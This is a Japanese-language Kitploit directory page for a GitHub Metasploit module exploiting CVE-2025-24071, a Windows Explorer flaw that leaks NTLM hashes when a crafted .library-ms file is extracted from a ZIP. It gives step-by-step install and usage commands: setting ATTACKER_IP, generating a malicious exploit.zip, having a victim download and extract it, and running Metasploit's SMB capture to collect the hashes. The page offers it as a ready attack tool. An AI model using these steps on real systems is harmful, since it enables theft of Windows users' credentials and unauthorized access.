Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-24071-msfvenom — CVE-2025-24071 用の Metasploit モジュール - .library-ms を介した Windows NTLM ハッシュの漏洩 | Kitploit
ツール/GitHubGitHub/folks-iwd/cve-2025-24071-msfvenom
エクスプロイトフレームワークパスワード攻撃ペイロード生成脆弱性分析エクスプロイト
GitHubfolks-iwd/cve-2025-24071-msfvenom

CVE-2025-24071-msfvenom

CVE-2025-24071 用の Metasploit モジュール - .library-ms を介した Windows NTLM ハッシュの漏洩

リポジトリを見る
2551年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-24071: .library-msファイルを介したNTLMハッシュ漏洩(Metasploitモジュール)

このリポジトリには、ZIPアーカイブから悪意のある.library-msファイルが展開されるとNTLMハッシュを漏洩させるWindows Explorerの脆弱性であるCVE-2025-24071を悪用するためのMetasploitモジュールが含まれています。

開発者: FOLKS-IWD


概要

この脆弱性は、ユーザーが特別に細工された.library-msファイルを含むZIPアーカイブを展開したときに発生します。Windows Explorerは、ファイル内で指定されたリモートサーバーへのSMB認証要求を自動的に開始し、ユーザーの操作なしにユーザーのNTLMハッシュを漏洩させます。

このMetasploitモジュール:

  1. 悪意のある.library-msファイルを生成します。
  2. それをZIPアーカイブにパックします。
  3. MetasploitのSMBキャプチャ機能と統合してNTLMハッシュを収集します。 image

インストール

  1. リポジトリをクローンします:
    root@kitploit:~
    git clone https://github.com/FOLKS-IWD/CVE-2025-24071-msfvenom.git
    cd CVE-2025-24071-msfvenom
    
  2. モジュールをMetasploitのモジュールディレクトリにコピーします:
    root@kitploit:~
    cp ntlm_hash_leak.rb ~/.msf4/modules/auxiliary/server/
    

使用方法

  1. モジュールをロードします:
    root@kitploit:~
    use auxiliary/server/ntlm_hash_leak
    
  2. 必要なオプションを設定します:
    root@kitploit:~
    set ATTACKER_IP 192.168.1.162  # Replace with your IP address
    set FILENAME exploit.zip       # Name of the malicious ZIP file
    set LIBRARY_NAME malicious.library-ms  # Name of the .library-ms file
    set SHARE_NAME shared          # SMB share name
    
  3. モジュールを実行します :
root@kitploit:~
  run
  1. モジュールは悪意のあるZIPファイル(exploit.zip)を生成します。このファイルをホストして、被害者にダウンロードおよび展開させます。
  2. MetasploitのSMBキャプチャモジュールを使用してNTLMハッシュを収集します:
    root@kitploit:~
    use auxiliary/server/capture/smb
    set SRVHOST 192.168.1.162  # Same as ATTACKER_IP
    run
    
ツールをダウンロード